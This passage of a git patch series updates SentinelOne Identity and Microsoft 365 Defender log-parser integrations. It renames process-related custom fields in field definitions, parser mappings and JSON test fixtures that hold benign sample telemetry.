"2024-11-22T09:10:09.467000Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "UNKNOWN", + "confidenceLevel": "MALICIOUS", + "id": "01935322-cc3a-76cc-890b-a1c2d1b815d4", + "name": "Brute force attack - Mass Account Lockout", + "status": "NEW" + } + } + } +} \ No newline at end of file From e898b653c1cbe982f1f50db26b795f2e018db548 Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Wed, 27 Nov 2024 12:20:13 +0200 Subject: [PATCH 095/150] Apply linter --- SentinelOne/identity/_meta/smart-descriptions.json | 2 +- SentinelOne/identity/ingest/parser.yml | 2 +- SentinelOne/identity/tests/test_alert_2.json | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/SentinelOne/identity/_meta/smart-descriptions.json b/SentinelOne/identity/_meta/smart-descriptions.json index ad570cb92..e09c5db80 100644 --- a/SentinelOne/identity/_meta/smart-descriptions.json +++ b/SentinelOne/identity/_meta/smart-descriptions.json @@ -43,4 +43,4 @@ } ] } -] \ No newline at end of file +] diff --git a/SentinelOne/identity/ingest/parser.yml b/SentinelOne/identity/ingest/parser.yml index 507745cb7..79cd3ec9f 100644 --- a/SentinelOne/identity/ingest/parser.yml +++ b/SentinelOne/identity/ingest/parser.yml @@ -64,4 +64,4 @@ stages: sentinelone.identity.classification: "{{json_event.message.classification}}" sentinelone.identity.confidenceLevel: "{{json_event.message.confidenceLevel}}" sentinelone.identity.result: "{{json_event.message.result}}" - sentinelone.identity.storyLineId: "{{json_event.message.storyLineId}}" \ No newline at end of file + sentinelone.identity.storyLineId: "{{json_event.message.storyLineId}}" diff --git a/SentinelOne/identity/tests/test_alert_2.json b/SentinelOne/identity/tests/test_alert_2.json index 6d697a5be..39420a5e0 100644 --- a/SentinelOne/identity/tests/test_alert_2.json +++ b/SentinelOne/identity/tests/test_alert_2.json @@ -19,4 +19,4 @@ } } } -} +} \ No newline at end of file From 5421cd89a9054a25770e7ce2e8e8ef1c1c018655 Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Wed, 27 Nov 2024 12:21:17 +0200 Subject: [PATCH 096/150] Fix datasources --- SentinelOne/identity/_meta/manifest.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/SentinelOne/identity/_meta/manifest.yml b/SentinelOne/identity/_meta/manifest.yml index 449172f8a..33be89396 100644 --- a/SentinelOne/identity/_meta/manifest.yml +++ b/SentinelOne/identity/_meta/manifest.yml @@ -6,3 +6,4 @@ description: >- SentinelOne Singularity Identity is a cybersecurity solution that provides identity protection and zero-trust security by continuously monitoring and analyzing user behaviors to detect and prevent potential threats. data_sources: + Application logs: activites performed on SentinelOne infrastructure are logged From 0c2434b976a689fa0b51c9337ae42ac599183414 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Wed, 27 Nov 2024 16:45:52 +0100 Subject: [PATCH 097/150] Changes on custom fields --- .../microsoft-365-defender/_meta/fields.yml | 254 ++++++++---------- .../microsoft-365-defender/ingest/parser.yml | 74 +++-- .../tests/test_device_event.json | 22 +- ...test_device_event_sensitive_file_read.json | 22 +- .../tests/test_device_events_2.json | 4 +- ...test_device_events_get_clipboard_data.json | 22 +- ...test_device_events_powershell_command.json | 22 +- ..._device_events_shell_link_create_file.json | 22 +- .../tests/test_device_file_event.json | 24 +- .../tests/test_device_file_event_02.json | 24 +- .../tests/test_device_image_load_event.json | 10 +- .../tests/test_device_logon_events.json | 6 +- .../tests/test_device_network_events.json | 26 +- .../tests/test_device_process_events.json | 42 ++- .../tests/test_device_process_events_2.json | 42 ++- .../tests/test_device_registry_events.json | 24 +- .../test_devices_events_script_content.json | 4 +- .../tests/test_email_events.json | 22 +- .../tests/test_email_url_info.json | 22 +- .../tests/test_identity_directory.json | 22 +- .../tests/test_identity_info.json | 22 +- .../tests/test_identity_logon.json | 22 +- .../tests/test_identity_query.json | 22 +- .../tests/test_local_ip.json | 22 +- .../tests/test_process_error.json | 12 +- 25 files changed, 364 insertions(+), 446 deletions(-) diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml index 0e6154ccd..c92ffb8db 100644 --- a/Microsoft/microsoft-365-defender/_meta/fields.yml +++ b/Microsoft/microsoft-365-defender/_meta/fields.yml @@ -133,6 +133,78 @@ action.properties.ISP: name: action.properties.ISP type: keyword +action.properties.InitiatingProcessAccountObjectId: + description: Azure AD object ID of the user account that ran the process responsible + for the event + name: action.properties.InitiatingProcessAccountObjectId + type: keyword + +action.properties.InitiatingProcessCommandLine: + description: Process commande Line that initiated the event + name: action.properties.InitiatingProcessCommandLine + type: keyword + +action.properties.InitiatingProcessFileSize: + description: Size of the process (image file) that initiated the event + name: action.properties.InitiatingProcessFileSize + type: long + +action.properties.InitiatingProcessIntegrityLevel: + description: Integrity level of the process that initiated the event. Windows assigns + integrity levels to processes based on certain characteristics, such as if they + were launched from an internet download. These integrity levels influence permissions + to resources + name: action.properties.InitiatingProcessIntegrityLevel + type: keyword + +action.properties.InitiatingProcessLogonId: + description: Identifier for a logon session of the process that initiated the event. + This identifier is unique on the same machine only between restarts. + name: action.properties.InitiatingProcessLogonId + type: keyword + +action.properties.InitiatingProcessTokenElevation: + description: Token type indicating the presence or absence of User Access Control + (UAC) privilege elevation applied to the process that initiated the event + name: action.properties.InitiatingProcessTokenElevation + type: keyword + +action.properties.InitiatingProcessVersionInfoCompanyName: + description: Company name from the version information of the process (image file) + responsible for the event + name: action.properties.InitiatingProcessVersionInfoCompanyName + type: keyword + +action.properties.InitiatingProcessVersionInfoFileDescription: + description: Description from the version information of the process (image file) + responsible for the event + name: action.properties.InitiatingProcessVersionInfoFileDescription + type: keyword + +action.properties.InitiatingProcessVersionInfoInternalFileName: + description: Internal file name from the version information of the process (image + file) responsible for the event + name: action.properties.InitiatingProcessVersionInfoInternalFileName + type: keyword + +action.properties.InitiatingProcessVersionInfoOriginalFileName: + description: Original file name from the version information of the process (image + file) responsible for the event + name: action.properties.InitiatingProcessVersionInfoOriginalFileName + type: keyword + +action.properties.InitiatingProcessVersionInfoProductName: + description: Product name from the version information of the process (image file) + responsible for the event + name: action.properties.InitiatingProcessVersionInfoProductName + type: keyword + +action.properties.InitiatingProcessVersionInfoProductVersion: + description: Product version from the version information of the process (image + file) responsible for the event + name: action.properties.InitiatingProcessVersionInfoProductVersion + type: keyword + action.properties.IsAdminOperation: description: Indicates whether the activity was performed by an administrator name: action.properties.IsAdminOperation @@ -281,6 +353,51 @@ action.properties.PreviousRegistryValueName: name: action.properties.PreviousRegistryValueName type: keyword +action.properties.ProcessIntegrityLevel: + description: Integrity level of the newly created process. Windows assigns integrity + levels to processes based on certain characteristics, such as if they were launched + from an internet downloaded. These integrity levels influence permissions to resources + name: action.properties.ProcessIntegrityLevel + type: keyword + +action.properties.ProcessTokenElevation: + description: Token type indicating the presence or absence of User Access Control + (UAC) privilege elevation applied to the newly created process + name: action.properties.ProcessTokenElevation + type: keyword + +action.properties.ProcessVersionInfoCompanyName: + description: Company name from the version information of the newly created process + name: action.properties.ProcessVersionInfoCompanyName + type: keyword + +action.properties.ProcessVersionInfoFileDescription: + description: Description from the version information of the newly created process + name: action.properties.ProcessVersionInfoFileDescription + type: keyword + +action.properties.ProcessVersionInfoInternalFileName: + description: Internal file name from the version information of the newly created + process + name: action.properties.ProcessVersionInfoInternalFileName + type: keyword + +action.properties.ProcessVersionInfoOriginalFileName: + description: Original file name from the version information of the newly created + process + name: action.properties.ProcessVersionInfoOriginalFileName + type: keyword + +action.properties.ProcessVersionInfoProductName: + description: Product name from the version information of the newly created process + name: action.properties.ProcessVersionInfoProductName + type: keyword + +action.properties.ProcessVersionInfoProductVersion: + description: Product version from the version information of the newly created process + name: action.properties.ProcessVersionInfoProductVersion + type: keyword + action.properties.Query: description: String used to run the query name: action.properties.Query @@ -412,143 +529,6 @@ action.properties.UserLevelPolicy: name: action.properties.UserLevelPolicy type: keyword -action.properties.process.AccountObjectId: - description: Azure AD object ID of the user account that ran the process responsible - for the event - name: action.properties.process.AccountObjectId - type: keyword - -action.properties.process.CommandLine: - description: Process commande Line that initiated the event - name: action.properties.process.CommandLine - type: keyword - -action.properties.process.FileSize: - description: Size of the process (image file) that initiated the event - name: action.properties.process.FileSize - type: long - -action.properties.process.IntegrityLevel: - description: Integrity level of the newly created process. Windows assigns integrity - levels to processes based on certain characteristics, such as if they were launched - from an internet downloaded. These integrity levels influence permissions to resources - name: action.properties.process.IntegrityLevel - type: keyword - -action.properties.process.LogonId: - description: Identifier for a logon session of the process that initiated the event. - This identifier is unique on the same machine only between restarts. - name: action.properties.process.LogonId - type: keyword - -action.properties.process.TokenElevation: - description: Token type indicating the presence or absence of User Access Control - (UAC) privilege elevation applied to the newly created process - name: action.properties.process.TokenElevation - type: keyword - -action.properties.process.VersionInfoCompanyName: - description: Company name from the version information of the newly created process - name: action.properties.process.VersionInfoCompanyName - type: keyword - -action.properties.process.VersionInfoFileDescription: - description: Description from the version information of the newly created process - name: action.properties.process.VersionInfoFileDescription - type: keyword - -action.properties.process.VersionInfoInternalFileName: - description: Internal file name from the version information of the newly created - process - name: action.properties.process.VersionInfoInternalFileName - type: keyword - -action.properties.process.VersionInfoOriginalFileName: - description: Original file name from the version information of the newly created - process - name: action.properties.process.VersionInfoOriginalFileName - type: keyword - -action.properties.process.VersionInfoProductName: - description: Product name from the version information of the newly created process - name: action.properties.process.VersionInfoProductName - type: keyword - -action.properties.process.VersionInfoProductVersion: - description: Product version from the version information of the newly created process - name: action.properties.process.VersionInfoProductVersion - type: keyword - -action.properties.process.parent.AccountObjectId: - description: Azure AD object ID of the user account that ran the parent process - responsible for the event - name: action.properties.process.parent.AccountObjectId - type: keyword - -action.properties.process.parent.CommandLine: - description: Parent process commande Line that initiated the event - name: action.properties.process.parent.CommandLine - type: keyword - -action.properties.process.parent.FileSize: - description: Size of the parent process (image file) that initiated the event - name: action.properties.process.parent.FileSize - type: long - -action.properties.process.parent.IntegrityLevel: - description: Integrity level of the parent process that initiated the event. Windows - assigns integrity levels to processes based on certain characteristics, such as - if they were launched from an internet download. These integrity levels influence - permissions to resources - name: action.properties.process.parent.IntegrityLevel - type: keyword - -action.properties.process.parent.LogonId: - description: Identifier for a logon session of the parent process that initiated - the event. This identifier is unique on the same machine only between restarts. - name: action.properties.process.parent.LogonId - type: keyword - -action.properties.process.parent.TokenElevation: - description: Token type indicating the presence or absence of User Access Control - (UAC) privilege elevation applied to the parent process that initiated the event - name: action.properties.process.parent.TokenElevation - type: keyword - -action.properties.process.parent.VersionInfoCompanyName: - description: Company name from the version information of the parent process (image - file) responsible for the event - name: action.properties.process.parent.VersionInfoCompanyName - type: keyword - -action.properties.process.parent.VersionInfoFileDescription: - description: Description from the version information of the parent process (image - file) responsible for the event - name: action.properties.process.parent.VersionInfoFileDescription - type: keyword - -action.properties.process.parent.VersionInfoInternalFileName: - description: Internal file name from the version information of the parent process - (image file) responsible for the event - name: action.properties.process.parent.VersionInfoInternalFileName - type: keyword - -action.properties.process.parent.VersionInfoOriginalFileName: - description: '' - name: action.properties.process.parent.VersionInfoOriginalFileName - type: keyword - -action.properties.process.parent.VersionInfoProductName: - description: '' - name: action.properties.process.parent.VersionInfoProductName - type: keyword - -action.properties.process.parent.VersionInfoProductVersion: - description: Product version from the version information of the parent process - (image file) responsible for the event - name: action.properties.process.parent.VersionInfoProductVersion - type: keyword - email.direction: description: The direction of the message based on the sending and receiving domains name: email.direction diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index 0a33f577f..fc32171cd 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml @@ -263,18 +263,18 @@ stages: process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}" process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}" process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}" - action.properties.process.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" - action.properties.process.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" - action.properties.process.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" - action.properties.process.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" - action.properties.process.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}" - action.properties.process.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" - action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" - action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" - action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" - action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" - action.properties.process.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" - action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" + action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" + action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" + action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" + action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}" + action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" + action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" + action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" - set: process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' @@ -307,26 +307,26 @@ stages: process.name: "{{json_event.message.properties.FileName | basename}}" process.command_line: "{{json_event.message.properties.ProcessCommandLine}}" process.working_directory: "{{json_event.message.properties.FolderPath | dirname}}" - action.properties.process.TokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" - action.properties.process.IntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" - action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" - action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" - action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" - action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" - action.properties.process.VersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" - action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" - action.properties.process.parent.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" - action.properties.process.parent.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" - action.properties.process.parent.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" - action.properties.process.parent.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" - action.properties.process.parent.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" - action.properties.process.parent.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" - action.properties.process.parent.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" - action.properties.process.parent.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" - action.properties.process.parent.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" - action.properties.process.parent.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" - action.properties.process.parent.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" - action.properties.process.parent.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" + action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" + action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" + action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" + action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" + action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" + action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" + action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" + action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" + action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" + action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" + action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" + action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" + action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" + action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" + action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" - set: process.parent.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' @@ -418,7 +418,6 @@ stages: event.dataset: "device_events" event.category: ["host"] action.properties.RemoteDeviceName: "{{json_event.message.properties.RemoteDeviceName}}" - #action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" set_device_file_certificate_info_fields: actions: - set: @@ -531,15 +530,6 @@ stages: - set: event.dataset: "device_process_events" event.category: ["process"] - #process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}" - #process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}" - #action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" - #action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" - #action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" - #action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" - #action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" - #action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" - #action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" set_device_registry_events_fields: actions: - set: diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event.json b/Microsoft/microsoft-365-defender/tests/test_device_event.json index 17cad5081..ca708b0ed 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_event.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_event.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json index 413d002c1..2655cb069 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json @@ -23,18 +23,16 @@ "action": { "properties": { "AccountSid": "S-1-2-3", - "process": { - "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", - "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", - "FileSize": 3316224, - "LogonId": "5223047", - "VersionInfoCompanyName": "Test Corporation", - "VersionInfoFileDescription": "Browser EXE", - "VersionInfoInternalFileName": "Browser.EXE", - "VersionInfoOriginalFileName": "Browser.EXE", - "VersionInfoProductName": "Test Product", - "VersionInfoProductVersion": "1, 0, 0, 1" - } + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", + "InitiatingProcessCommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "InitiatingProcessFileSize": 3316224, + "InitiatingProcessLogonId": "5223047", + "InitiatingProcessVersionInfoCompanyName": "Test Corporation", + "InitiatingProcessVersionInfoFileDescription": "Browser EXE", + "InitiatingProcessVersionInfoInternalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoOriginalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoProductName": "Test Product", + "InitiatingProcessVersionInfoProductVersion": "1, 0, 0, 1" }, "type": "SensitiveFileRead" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json index 4964dae1f..1f1351d52 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json @@ -16,9 +16,7 @@ "@timestamp": "2024-10-22T15:09:08.851712Z", "action": { "properties": { - "process": { - "LogonId": "0" - } + "InitiatingProcessLogonId": "0" }, "type": "ScriptContent" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json index c34cefa50..3292ed6fe 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json @@ -22,18 +22,16 @@ "@timestamp": "2024-11-12T10:19:26.502777Z", "action": { "properties": { - "process": { - "AccountObjectId": "12345678-abcd-1234-efab-56789123abcd", - "CommandLine": "\"OUTLOOK.EXE\" ", - "FileSize": 44152968, - "LogonId": "389220681", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Microsoft Outlook", - "VersionInfoInternalFileName": "Outlook", - "VersionInfoOriginalFileName": "Outlook.exe", - "VersionInfoProductName": "Microsoft Outlook", - "VersionInfoProductVersion": "16.0.17928.20216" - } + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-efab-56789123abcd", + "InitiatingProcessCommandLine": "\"OUTLOOK.EXE\" ", + "InitiatingProcessFileSize": 44152968, + "InitiatingProcessLogonId": "389220681", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Outlook", + "InitiatingProcessVersionInfoInternalFileName": "Outlook", + "InitiatingProcessVersionInfoOriginalFileName": "Outlook.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft Outlook", + "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216" }, "type": "GetClipboardData" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json index ea0ddb0df..fea26327a 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json @@ -22,18 +22,16 @@ "@timestamp": "2024-11-12T10:15:59.550882Z", "action": { "properties": { - "process": { - "AccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789", - "CommandLine": "powershell.exe", - "FileSize": 450560, - "LogonId": "398124703", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Windows PowerShell", - "VersionInfoInternalFileName": "POWERSHELL", - "VersionInfoOriginalFileName": "PowerShell.EXE", - "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "VersionInfoProductVersion": "10.0.22621.3085" - } + "InitiatingProcessAccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789", + "InitiatingProcessCommandLine": "powershell.exe", + "InitiatingProcessFileSize": 450560, + "InitiatingProcessLogonId": "398124703", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Windows PowerShell", + "InitiatingProcessVersionInfoInternalFileName": "POWERSHELL", + "InitiatingProcessVersionInfoOriginalFileName": "PowerShell.EXE", + "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "InitiatingProcessVersionInfoProductVersion": "10.0.22621.3085" }, "type": "PowerShellCommand" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json index 48696c644..672754009 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json @@ -22,18 +22,16 @@ "@timestamp": "2024-11-12T10:17:23.330722Z", "action": { "properties": { - "process": { - "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", - "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", - "FileSize": 1621656, - "LogonId": "8066492", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Microsoft Word", - "VersionInfoInternalFileName": "WinWord", - "VersionInfoOriginalFileName": "WinWord.exe", - "VersionInfoProductName": "Microsoft Office", - "VersionInfoProductVersion": "16.0.17928.20216" - } + "InitiatingProcessAccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", + "InitiatingProcessCommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "InitiatingProcessFileSize": 1621656, + "InitiatingProcessLogonId": "8066492", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Word", + "InitiatingProcessVersionInfoInternalFileName": "WinWord", + "InitiatingProcessVersionInfoOriginalFileName": "WinWord.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft Office", + "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216" }, "type": "ShellLinkCreateFileEvent" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json index 94b70858f..7428190cf 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_file_event.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_file_event.json @@ -16,19 +16,17 @@ "@timestamp": "2022-09-01T07:46:42.468408Z", "action": 